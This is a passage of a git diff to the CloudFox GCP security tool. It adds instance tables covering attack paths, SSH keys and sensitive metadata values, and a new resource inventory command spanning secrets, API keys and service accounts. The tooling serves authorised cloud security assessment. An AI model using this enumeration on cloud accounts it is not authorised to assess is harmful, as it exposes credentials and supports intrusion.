LootFiles() []internal.LootFile { - // Define any loot files if applicable - return []internal.LootFile{} +// getInstancesTableHeader returns the instances table header +// Columns are grouped logically: +// - Identity: Project, Name, Type, Zone, State, Machine Type +// - Network: External IP, Internal IP, IP Forward +// - Service Account: Service Account, SA Attack Paths, Scopes, Default SA, Broad Scopes +// - Access Control: OS Login, OS Login 2FA, Block Proj Keys, Serial Port +// - Protection: Delete Protect, Last Snapshot +// - Hardware Security: Shielded VM, Secure Boot, vTPM, Integrity, Confidential +// - Disk Encryption: Encryption, KMS Key +// - IAM: IAM Binding Role, IAM Binding Principal +func (m *InstancesModule) getInstancesTableHeader() []string { + return []string{ + // Identity + "Project", + "Name", + "Type", + "Zone", + "State", + "Machine Type", + // Network + "External IP", + "Internal IP", + "IP Forward", + // Service Account + "Service Account", + "SA Attack Paths", + "Scopes", + "Default SA", + "Broad Scopes", + // Access Control + "OS Login", + "OS Login 2FA", + "Block Proj Keys", + "Serial Port", + // Protection + "Delete Protect", + "Last Snapshot", + // Hardware Security + "Shielded VM", + "Secure Boot", + "vTPM", + "Integrity", + "Confidential", + // Disk Encryption + "Encryption", + "KMS Key", + // IAM + "IAM Binding Role", + "IAM Binding Principal", + } } -func runGCPInstancesCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_INSTANCES_MODULE_NAME) - return +// isManagedInstance returns true if the instance is managed by a GCP service (GKE, Dataproc, etc.) +func isManagedInstance(instanceType ComputeEngineService.InstanceType) bool { + switch instanceType { + case ComputeEngineService.InstanceTypeGKE, + ComputeEngineService.InstanceTypeMIG, + ComputeEngineService.InstanceTypeDataproc, + ComputeEngineService.InstanceTypeDataflow, + ComputeEngineService.InstanceTypeComposer, + ComputeEngineService.InstanceTypeBatchJob, + ComputeEngineService.InstanceTypeAppEngine: + return true + default: + return false } +} - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) +// formatManagedBool formats a boolean value with context for managed instances +// For managed instances, values that match expected behavior are annotated with (TYPE) to indicate this is expected +// Example: Delete Protection "No" on a GKE node shows "No (GKE)" because GKE nodes are ephemeral +func formatManagedBool(value bool, instanceType ComputeEngineService.InstanceType, expectedForManaged bool) string { + if !isManagedInstance(instanceType) { + return shared.BoolToYesNo(value) } - ces := ComputeEngineService.New() - var results []ComputeEngineService.ComputeEngineInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - result, err := ces.Instances(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return - } - results = append(results, result...) - logger.InfoM(fmt.Sprintf("Done retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - cloudfoxOutput := GCPInstancesResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_INSTANCES_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return - } - logger.InfoM("Done writing output", globals.GCP_INSTANCES_MODULE_NAME) + // For managed instances, add context when the value matches expected behavior + // This indicates "this looks like a finding but it's expected for this instance type" + shortType := string(instanceType) + if value == expectedForManaged { + if value { + return fmt.Sprintf("Yes (%s)", shortType) + } + return fmt.Sprintf("No (%s)", shortType) + } + + // Value differs from expected - no annotation needed + return shared.BoolToYesNo(value) +} + +// formatManagedSnapshot formats the last snapshot date with context for managed instances +func formatManagedSnapshot(lastSnapshot string, instanceType ComputeEngineService.InstanceType) string { + // For ephemeral/managed instances, "Never" is expected + if lastSnapshot == "" || lastSnapshot == "Never" { + if isManagedInstance(instanceType) { + return fmt.Sprintf("Never (%s)", string(instanceType)) + } + return "Never" + } + + // Truncate to just the date portion if it's a full timestamp + if len(lastSnapshot) > 10 { + lastSnapshot = lastSnapshot[:10] + } + return lastSnapshot +} + +// getSensitiveMetadataTableHeader returns the sensitive metadata table header +func (m *InstancesModule) getSensitiveMetadataTableHeader() []string { + return []string{ + "Project", + "Source", + "Zone", + "Metadata Key", + "Variable", + "Type", + "Value", + } +} + +// getSSHKeysTableHeader returns the SSH keys table header +func (m *InstancesModule) getSSHKeysTableHeader() []string { + return []string{ + "Project", + "Source", + "Zone", + "SSH Key", + } +} + +// buildSSHKeysTableForProject builds the SSH keys table body for a specific project +func (m *InstancesModule) buildSSHKeysTableForProject(projectID string, instances []ComputeEngineService.ComputeEngineInfo) [][]string { + var body [][]string + + // Add project-level SSH keys + if meta, ok := m.ProjectMetadata[projectID]; ok && meta != nil && len(meta.ProjectSSHKeys) > 0 { + for _, key := range meta.ProjectSSHKeys { + body = append(body, []string{ + m.GetProjectName(projectID), + "PROJECT", + "-", + truncateSSHKeyMiddle(key, 100), + }) + } + } + + // Add instance-level SSH keys + for _, instance := range instances { + if len(instance.SSHKeys) > 0 { + for _, key := range instance.SSHKeys { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.Zone, + truncateSSHKeyMiddle(key, 100), + }) + } + } + } + + return body +} + +// truncateSSHKeyMiddle truncates an SSH key in the middle, preserving start and end for searchability +// Format: "user:ssh-rsa AAAA...xyz comment" -> "user:ssh-rsa AAAA...xyz comment" +func truncateSSHKeyMiddle(key string, maxLen int) string { + if len(key) <= maxLen { + return key + } + // Keep more at the start (user and key type) and end (comment) + startLen := maxLen * 2 / 3 // ~66% at start + endLen := maxLen - startLen - 5 // 5 for " ... " + if endLen < 10 { + endLen = 10 + startLen = maxLen - endLen - 5 + } + return key[:startLen] + " ... " + key[len(key)-endLen:] +} + +// instancesToTableBody converts instances to table body rows +func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService.ComputeEngineInfo) [][]string { + var body [][]string + for _, instance := range instances { + // Get first service account email (most instances have just one) + saEmail := "-" + scopes := "-" + if len(instance.ServiceAccounts) > 0 { + saEmail = instance.ServiceAccounts[0].Email + scopes = ComputeEngineService.FormatScopes(instance.ServiceAccounts[0].Scopes) + } + + // Check attack paths (privesc/exfil/lateral) for the service account + // FoxMapper takes priority if available (graph-based analysis) + attackPaths := "run foxmapper" + if saEmail != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, saEmail) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" + } + + // External IP display + externalIP := instance.ExternalIP + if externalIP == "" { + externalIP = "-" + } + + // Encryption display + encryption := instance.BootDiskEncryption + if encryption == "" { + encryption = "Google" + } + + // KMS Key display + kmsKey := instance.BootDiskKMSKey + if kmsKey == "" { + kmsKey = "-" + } + + // Instance type for contextual display + instType := instance.InstanceType + if instType == "" { + instType = ComputeEngineService.InstanceTypeStandalone + } + + // Base row data (reused for each IAM binding) + // Order matches header groups: Identity, Network, Service Account, Access Control, Protection, Hardware Security, Disk Encryption + baseRow := []string{ + // Identity + m.GetProjectName(instance.ProjectID), + instance.Name, + string(instType), + instance.Zone, + instance.State, + instance.MachineType, + // Network + externalIP, + instance.InternalIP, + shared.BoolToYesNo(instance.CanIPForward), + // Service Account + saEmail, + attackPaths, + scopes, + // Default SA is expected for GKE/managed instances + formatManagedBool(instance.HasDefaultSA, instType, true), + // Broad scopes are expected for GKE/managed instances + formatManagedBool(instance.HasCloudScopes, instType, true), + // Access Control + shared.BoolToYesNo(instance.OSLoginEnabled), + shared.BoolToYesNo(instance.OSLogin2FAEnabled), + shared.BoolToYesNo(instance.BlockProjectSSHKeys), + shared.BoolToYesNo(instance.SerialPortEnabled), + // Protection - Delete protection is NOT expected for managed instances (they're ephemeral) + formatManagedBool(instance.DeletionProtection, instType, false), + // Snapshots are not expected for ephemeral/managed instances + formatManagedSnapshot(instance.LastSnapshotDate, instType), + // Hardware Security + shared.BoolToYesNo(instance.ShieldedVM), + shared.BoolToYesNo(instance.SecureBoot), + shared.BoolToYesNo(instance.VTPMEnabled), + shared.BoolToYesNo(instance.IntegrityMonitoring), + shared.BoolToYesNo(instance.ConfidentialVM), + // Disk Encryption + encryption, + kmsKey, + } + + // If instance has IAM bindings, create one row per binding + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = binding.Role + row[len(baseRow)+1] = binding.Member + body = append(body, row) + } + } else { + // No IAM bindings - single row + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = "-" + row[len(baseRow)+1] = "-" + body = append(body, row) + } } + return body +} + +// buildSensitiveMetadataTableForProject builds the sensitive metadata table body for a specific project +func (m *InstancesModule) buildSensitiveMetadataTableForProject(projectID string, instances []ComputeEngineService.ComputeEngineInfo) [][]string { + var body [][]string + + // Add project-level sensitive metadata + if meta, ok := m.ProjectMetadata[projectID]; ok && meta != nil && len(meta.SensitiveMetadata) > 0 { + for _, item := range meta.SensitiveMetadata { + body = append(body, []string{ + m.GetProjectName(projectID), + "PROJECT", + "-", + item.MetadataKey, + item.Key, + item.Type, + item.Value, + }) + } + } + + // Add instance-level sensitive metadata + for _, instance := range instances { + if len(instance.SensitiveMetadata) > 0 { + for _, item := range instance.SensitiveMetadata { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.Zone, + item.MetadataKey, + item.Key, + item.Type, + item.Value, + }) + } + } + } + + return body } diff --git a/gcp/commands/inventory.go b/gcp/commands/inventory.go new file mode 100644 index 00000000..f88f0701 --- /dev/null +++ b/gcp/commands/inventory.go @@ -0,0 +1,1537 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strconv" + "strings" + "sync" + + apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" + artifactregistryservice "github.com/BishopFox/cloudfox/gcp/services/artifactRegistryService" + assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" + bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + bigtableservice "github.com/BishopFox/cloudfox/gcp/services/bigtableService" + certmanagerservice "github.com/BishopFox/cloudfox/gcp/services/certManagerService" + cloudarmorservice "github.com/BishopFox/cloudfox/gcp/services/cloudArmorService" + cloudbuildservice "github.com/BishopFox/cloudfox/gcp/services/cloudbuildService" + cloudrunservice "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + cloudsqlservice "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + cloudstorageservice "github.com/BishopFox/cloudfox/gcp/services/cloudStorageService" + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + computeengineservice "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + dataflowservice "github.com/BishopFox/cloudfox/gcp/services/dataflowService" + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + dnsservice "github.com/BishopFox/cloudfox/gcp/services/dnsService" + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + functionsservice "github.com/BishopFox/cloudfox/gcp/services/functionsService" + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + iamservice "github.com/BishopFox/cloudfox/gcp/services/iamService" + kmsservice "github.com/BishopFox/cloudfox/gcp/services/kmsService" + loggingservice "github.com/BishopFox/cloudfox/gcp/services/loggingService" + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + schedulerservice "github.com/BishopFox/cloudfox/gcp/services/schedulerService" + secretsservice "github.com/BishopFox/cloudfox/gcp/services/secretsService" + sourcereposservice "github.com/BishopFox/cloudfox/gcp/services/sourceReposService" + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + serviceusage "google.golang.org/api/serviceusage/v1" +) + +const GCP_INVENTORY_MODULE_NAME = "inventory" + +var GCPInventoryCommand = &cobra.Command{ + Use: GCP_INVENTORY_MODULE_NAME, + Aliases: []string{"inv", "resources"}, + Short: "Quick resource inventory - works without Cloud Asset API", + Long: `Quick resource inventory that works even when Cloud Asset API is not enabled. + +USE THIS COMMAND WHEN: +- You want a quick overview of resources across projects +- Cloud Asset API is not enabled in your projects +- You need a fallback that always works + +For deep analysis with IAM policies and resource dependencies, use 'asset-inventory' instead +(requires Cloud Asset API to be enabled). + +HOW IT WORKS: +1. Tries Cloud Asset API first (if enabled) for complete coverage +2. Falls back to Service Usage API to identify enabled services +3. Always runs dedicated CloudFox enumeration for security-relevant resources + +This ensures you get results even in restricted environments where the +Cloud Asset API (cloudasset.googleapis.com) is not enabled. + +OUTPUT INCLUDES: +- Resource counts by type (Compute instances, GKE clusters, Cloud Functions, etc.) +- Regional distribution of resources +- CloudFox coverage analysis (identifies potential blind spots) +- Total resource counts per project + +SUPPORTED RESOURCE TYPES: +- Compute: Instances, Disks, Snapshots, Images +- Containers: GKE Clusters, Cloud Run Services/Jobs +- Serverless: Cloud Functions, App Engine +- Storage: Buckets, Filestore, BigQuery Datasets +- Databases: Cloud SQL, Spanner, Bigtable, Memorystore +- Networking: DNS Zones +- Security: Service Accounts, KMS Keys, Secrets, API Keys +- DevOps: Cloud Build Triggers, Source Repos, Artifact Registry +- Data: Pub/Sub Topics, Dataflow Jobs, Dataproc Clusters +- AI/ML: Notebooks, Composer Environments + +Examples: + cloudfox gcp inventory -p my-project + cloudfox gcp inventory -A # All accessible projects`, + Run: runGCPInventoryCommand, +} + +// ResourceCount tracks count of a resource type per region +type ResourceCount struct { + ResourceType string + Region string + Count int + ResourceIDs []string // For loot file +} + +// AssetTypeSummary holds Cloud Asset Inventory counts by type +type AssetTypeSummary struct { + AssetType string + Count int + Covered bool // Whether CloudFox has a dedicated module for this type +} + +// InventoryModule handles resource inventory enumeration +type InventoryModule struct { + gcpinternal.BaseGCPModule + + // Resource tracking (from dedicated enumeration) - NOW PER PROJECT + projectResourceCounts map[string]map[string]map[string]int // projectID -> resourceType -> region -> count + projectResourceIDs map[string]map[string]map[string][]string // projectID -> resourceType -> region -> []resourceID + projectRegions map[string]map[string]bool // projectID -> regions with resources + mu sync.Mutex + + // Asset Inventory tracking (complete coverage) + assetCounts map[string]map[string]int // projectID -> assetType -> count + assetAPIEnabled bool // Whether any project had Asset API enabled + assetAPIFailedProjs []string // Projects where Asset API failed + + // Service Usage tracking (fallback when Asset API not available) + enabledServices map[string][]string // projectID -> list of enabled services + + // Totals (per project) + projectTotalByType map[string]map[string]int // projectID -> resourceType -> count + projectTotalByRegion map[string]map[string]int // projectID -> region -> count + projectGrandTotal map[string]int // projectID -> total count + + // Global totals + grandTotal int + + // Asset totals + assetGrandTotal int +} + +// InventoryOutput implements CloudfoxOutput interface +type InventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o InventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o InventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_INVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &InventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + projectResourceCounts: make(map[string]map[string]map[string]int), + projectResourceIDs: make(map[string]map[string]map[string][]string), + projectRegions: make(map[string]map[string]bool), + projectTotalByType: make(map[string]map[string]int), + projectTotalByRegion: make(map[string]map[string]int), + projectGrandTotal: make(map[string]int), + assetCounts: make(map[string]map[string]int), + enabledServices: make(map[string][]string), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *InventoryModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Starting resource inventory enumeration...", GCP_INVENTORY_MODULE_NAME) + + // Initialize resource type maps for each project + for _, projectID := range m.ProjectIDs { + m.initializeResourceTypesForProject(projectID) + } + + // First, get complete asset counts from Cloud Asset Inventory API + // This provides comprehensive coverage of ALL resources + logger.InfoM("Querying Cloud Asset Inventory for complete resource coverage...", GCP_INVENTORY_MODULE_NAME) + m.collectAssetInventory(ctx, logger) + + // If Asset Inventory API failed, try Service Usage API as a fallback + // This shows which services are enabled (indicates potential resources) + if !m.assetAPIEnabled { + logger.InfoM("Falling back to Service Usage API to identify enabled services...", GCP_INVENTORY_MODULE_NAME) + m.collectEnabledServices(ctx, logger) + } + + // Then run detailed enumeration for security-relevant resources + // This always runs as a backup and provides security metadata + logger.InfoM("Running detailed enumeration for security analysis...", GCP_INVENTORY_MODULE_NAME) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_INVENTORY_MODULE_NAME, m.processProject) + + // Calculate totals + m.calculateTotals() + + if m.grandTotal == 0 && m.assetGrandTotal == 0 && len(m.enabledServices) == 0 { + logger.InfoM("No resources found", GCP_INVENTORY_MODULE_NAME) + return + } + + // Show summary based on what data we got + if m.assetAPIEnabled { + logger.SuccessM(fmt.Sprintf("Cloud Asset Inventory: %d total resources across %d asset types", + m.assetGrandTotal, m.countAssetTypes()), GCP_INVENTORY_MODULE_NAME) + } else if len(m.enabledServices) > 0 { + totalServices := 0 + for _, services := range m.enabledServices { + totalServices += len(services) + } + logger.SuccessM(fmt.Sprintf("Service Usage API: %d enabled services detected (may contain resources CloudFox doesn't enumerate)", + totalServices), GCP_INVENTORY_MODULE_NAME) + } + logger.SuccessM(fmt.Sprintf("CloudFox enumeration: %d resources across %d project(s) (with security metadata)", + m.grandTotal, len(m.projectGrandTotal)), GCP_INVENTORY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// initializeResourceTypes sets up the resource type maps for a project +func (m *InventoryModule) initializeResourceTypesForProject(projectID string) { + m.mu.Lock() + defer m.mu.Unlock() + + if m.projectResourceCounts[projectID] != nil { + return // Already initialized + } + + m.projectResourceCounts[projectID] = make(map[string]map[string]int) + m.projectResourceIDs[projectID] = make(map[string]map[string][]string) + m.projectRegions[projectID] = make(map[string]bool) + m.projectTotalByType[projectID] = make(map[string]int) + m.projectTotalByRegion[projectID] = make(map[string]int) +} + +// processProject enumerates all resources in a single project +func (m *InventoryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating resources in project: %s", projectID), GCP_INVENTORY_MODULE_NAME) + } + + var wg sync.WaitGroup + semaphore := make(chan struct{}, 10) // Limit concurrent API calls per project + + // Compute resources + wg.Add(1) + go m.enumComputeInstances(ctx, projectID, &wg, semaphore) + + // GKE + wg.Add(1) + go m.enumGKEClusters(ctx, projectID, &wg, semaphore) + + // Cloud Run + wg.Add(1) + go m.enumCloudRun(ctx, projectID, &wg, semaphore) + + // Cloud Functions + wg.Add(1) + go m.enumCloudFunctions(ctx, projectID, &wg, semaphore) + + // Storage + wg.Add(1) + go m.enumBuckets(ctx, projectID, &wg, semaphore) + + // BigQuery + wg.Add(1) + go m.enumBigQuery(ctx, projectID, &wg, semaphore) + + // Cloud SQL + wg.Add(1) + go m.enumCloudSQL(ctx, projectID, &wg, semaphore) + + // Spanner + wg.Add(1) + go m.enumSpanner(ctx, projectID, &wg, semaphore) + + // Bigtable + wg.Add(1) + go m.enumBigtable(ctx, projectID, &wg, semaphore) + + // Memorystore + wg.Add(1) + go m.enumMemorystore(ctx, projectID, &wg, semaphore) + + // Filestore + wg.Add(1) + go m.enumFilestore(ctx, projectID, &wg, semaphore) + + // Service Accounts + wg.Add(1) + go m.enumServiceAccounts(ctx, projectID, &wg, semaphore) + + // KMS + wg.Add(1) + go m.enumKMS(ctx, projectID, &wg, semaphore) + + // Secrets + wg.Add(1) + go m.enumSecrets(ctx, projectID, &wg, semaphore) + + // API Keys + wg.Add(1) + go m.enumAPIKeys(ctx, projectID, &wg, semaphore) + + // Pub/Sub + wg.Add(1) + go m.enumPubSub(ctx, projectID, &wg, semaphore) + + // DNS + wg.Add(1) + go m.enumDNS(ctx, projectID, &wg, semaphore) + + // Cloud Build + wg.Add(1) + go m.enumCloudBuild(ctx, projectID, &wg, semaphore) + + // Source Repos + wg.Add(1) + go m.enumSourceRepos(ctx, projectID, &wg, semaphore) + + // Artifact Registry + wg.Add(1) + go m.enumArtifactRegistry(ctx, projectID, &wg, semaphore) + + // Dataflow + wg.Add(1) + go m.enumDataflow(ctx, projectID, &wg, semaphore) + + // Dataproc + wg.Add(1) + go m.enumDataproc(ctx, projectID, &wg, semaphore) + + // Notebooks + wg.Add(1) + go m.enumNotebooks(ctx, projectID, &wg, semaphore) + + // Composer + wg.Add(1) + go m.enumComposer(ctx, projectID, &wg, semaphore) + + // Scheduler + wg.Add(1) + go m.enumScheduler(ctx, projectID, &wg, semaphore) + + // Logging Sinks + wg.Add(1) + go m.enumLoggingSinks(ctx, projectID, &wg, semaphore) + + // Cloud Armor + wg.Add(1) + go m.enumCloudArmor(ctx, projectID, &wg, semaphore) + + // SSL Certificates + wg.Add(1) + go m.enumSSLCertificates(ctx, projectID, &wg, semaphore) + + wg.Wait() +} + +// Resource enumeration functions + +func (m *InventoryModule) enumComputeInstances(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := computeengineservice.New() + instances, err := svc.Instances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + region := extractRegionFromZone(inst.Zone) + m.addResource(projectID, "Compute Instances", region, fmt.Sprintf("projects/%s/zones/%s/instances/%s", projectID, inst.Zone, inst.Name)) + } +} + +func (m *InventoryModule) enumGKEClusters(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := gkeservice.New() + clusters, _, err := svc.Clusters(projectID) // Returns clusters, nodePools, error + if err != nil { + return + } + + for _, cluster := range clusters { + m.addResource(projectID, "GKE Clusters", cluster.Location, fmt.Sprintf("projects/%s/locations/%s/clusters/%s", projectID, cluster.Location, cluster.Name)) + } +} + +func (m *InventoryModule) enumCloudRun(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudrunservice.New() + services, err := svc.Services(projectID) + if err == nil { + for _, s := range services { + m.addResource(projectID, "Cloud Run Services", s.Region, fmt.Sprintf("projects/%s/locations/%s/services/%s", projectID, s.Region, s.Name)) + } + } + + jobs, err := svc.Jobs(projectID) + if err == nil { + for _, job := range jobs { + m.addResource(projectID, "Cloud Run Jobs", job.Region, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Region, job.Name)) + } + } +} + +func (m *InventoryModule) enumCloudFunctions(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := functionsservice.New() + functions, err := svc.Functions(projectID) + if err != nil { + return + } + + for _, fn := range functions { + m.addResource(projectID, "Cloud Functions", fn.Region, fmt.Sprintf("projects/%s/locations/%s/functions/%s", projectID, fn.Region, fn.Name)) + } +} + +func (m *InventoryModule) enumBuckets(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudstorageservice.New() + buckets, err := svc.Buckets(projectID) + if err != nil { + return + } + + for _, bucket := range buckets { + m.addResource(projectID, "Cloud Storage Buckets", bucket.Location, fmt.Sprintf("gs://%s", bucket.Name)) + } +} + +func (m *InventoryModule) enumBigQuery(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := bigqueryservice.New() + datasets, err := svc.BigqueryDatasets(projectID) + if err != nil { + return + } + + for _, ds := range datasets { + m.addResource(projectID, "BigQuery Datasets", ds.Location, fmt.Sprintf("projects/%s/datasets/%s", projectID, ds.DatasetID)) + } +} + +func (m *InventoryModule) enumCloudSQL(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudsqlservice.New() + instances, err := svc.Instances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource(projectID, "Cloud SQL Instances", inst.Region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + } +} + +func (m *InventoryModule) enumSpanner(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := spannerservice.New() + result, err := svc.ListInstancesAndDatabases(projectID) + if err != nil { + return + } + + for _, inst := range result.Instances { + // Spanner config contains region info + region := "global" + if inst.Config != "" { + region = inst.Config + } + m.addResource(projectID, "Spanner Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + } +} + +func (m *InventoryModule) enumBigtable(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := bigtableservice.New() + result, err := svc.ListInstances(projectID) + if err != nil { + return + } + + for _, inst := range result.Instances { + // Use first cluster location as region + region := "global" + if len(inst.Clusters) > 0 { + region = inst.Clusters[0].Location + } + m.addResource(projectID, "Bigtable Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + } +} + +func (m *InventoryModule) enumMemorystore(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := memorystoreservice.New() + instances, err := svc.ListRedisInstances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource(projectID, "Memorystore Redis", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + } +} + +func (m *InventoryModule) enumFilestore(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := filestoreservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource(projectID, "Filestore Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + } +} + +func (m *InventoryModule) enumServiceAccounts(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := iamservice.New() + // Use ServiceAccountsBasic to avoid querying keys (faster, fewer permissions needed) + accounts, err := svc.ServiceAccountsBasic(projectID) + if err != nil { + return + } + + for _, sa := range accounts { + m.addResource(projectID, "Service Accounts", "global", sa.Email) + } +} + +func (m *InventoryModule) enumKMS(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := kmsservice.New() + keyRings, err := svc.KeyRings(projectID) + if err != nil { + return + } + + for _, kr := range keyRings { + m.addResource(projectID, "KMS Key Rings", kr.Location, fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name)) + } +} + +func (m *InventoryModule) enumSecrets(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc, err := secretsservice.NewWithSession(nil) + if err != nil { + return + } + secrets, err := svc.Secrets(projectID) + if err != nil { + return + } + + for _, secret := range secrets { + // Secrets are global but may have regional replicas + region := "global" + if len(secret.ReplicaLocations) > 0 { + region = secret.ReplicaLocations[0] + } + m.addResource(projectID, "Secrets", region, secret.Name) + } +} + +func (m *InventoryModule) enumAPIKeys(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := apikeysservice.New() + keys, err := svc.ListAPIKeys(projectID) + if err != nil { + return + } + + for _, key := range keys { + m.addResource(projectID, "API Keys", "global", key.Name) + } +} + +func (m *InventoryModule) enumPubSub(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := pubsubservice.New() + topics, err := svc.Topics(projectID) + if err == nil { + for _, topic := range topics { + m.addResource(projectID, "Pub/Sub Topics", "global", fmt.Sprintf("projects/%s/topics/%s", projectID, topic.Name)) + } + } + + subscriptions, err := svc.Subscriptions(projectID) + if err == nil { + for _, sub := range subscriptions { + m.addResource(projectID, "Pub/Sub Subscriptions", "global", fmt.Sprintf("projects/%s/subscriptions/%s", projectID, sub.Name)) + } + } +} + +func (m *InventoryModule) enumDNS(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := dnsservice.New() + zones, err := svc.Zones(projectID) + if err != nil { + return + } + + for _, zone := range zones { + m.addResource(projectID, "DNS Zones", "global", fmt.Sprintf("projects/%s/managedZones/%s", projectID, zone.Name)) + } +} + 